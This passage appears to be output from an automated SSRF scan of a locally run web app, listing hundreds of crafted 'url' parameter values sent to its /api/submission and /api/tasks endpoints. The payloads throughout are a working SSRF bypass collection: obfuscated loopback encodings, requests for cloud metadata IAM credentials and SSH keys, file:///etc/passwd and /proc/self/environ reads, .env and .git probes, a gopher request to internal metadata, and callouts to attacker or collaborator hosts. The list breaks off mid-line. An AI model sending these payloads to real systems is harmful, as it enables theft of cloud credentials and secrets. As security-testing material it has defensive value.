`http://localhost:4200/api/submission?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=0%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.1` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/submission?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/submission?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.1.3` +- Testing: `http://localhost:4200/api/submission?url=0` +- Testing: `http://localhost:4200/api/submission?url=127.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.1` +- Testing: `http://localhost:4200/api/submission?url=localhost` +- Testing: `http://localhost:4200/api/submission?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/submission?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/submission?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/submission?url=7F000001` +- Testing: `http://localhost:4200/api/submission?url=2130706433` +- Testing: `http://localhost:4200/api/submission?url=6425673729` +- Testing: `http://localhost:4200/api/submission?url=127001` +- Testing: `http://localhost:4200/api/submission?url=127_0._0_1` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/submission?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127` +- Testing: `http://localhost:4200/api/submission?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001` +- Testing: `http://localhost:4200/api/submission?url=017700000001` +- Testing: `http://localhost:4200/api/submission?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/submission?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/submission?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/submission?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/submission?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254` +- Testing: `http://localhost:4200/api/submission?url=2852039166` +- Testing: `http://localhost:4200/api/submission?url=7147006462` +- Testing: `http://localhost:4200/api/submission?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/submission?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/submission?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/submission?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/submission?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/submission?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/submission?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/submission?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/submission?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/submission?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/submission?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/submission?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.0` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521` +- Testing: `http://localhost:4200/api/submission?url=3232235777` +- Testing: `http://localhost:4200/api/submission?url=425.510.425.510` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/submission?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=instance-data` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A22` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A443` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A80` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/submission?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/submission?url=loopback` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A22` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A80` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A443` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/submission?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/submission?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/submission?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/submission?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/submission?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/submission?url=127.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/submission?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/submission?url=2130706433%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235777%2F` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/submission?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/submission?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=0%2F` +- Testing: `http://localhost:4200/api/submission?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tasks +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tasks?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tasks?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tasks?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tasks?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=0` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tasks?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tasks?url=2130706433` +- Testing: `http://localhost:4200/api/tasks?url=017700000001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tasks?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tasks?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tasks?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tasks?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tasks?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tasks?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tasks?url=127.000000000000.1` +- Testing: 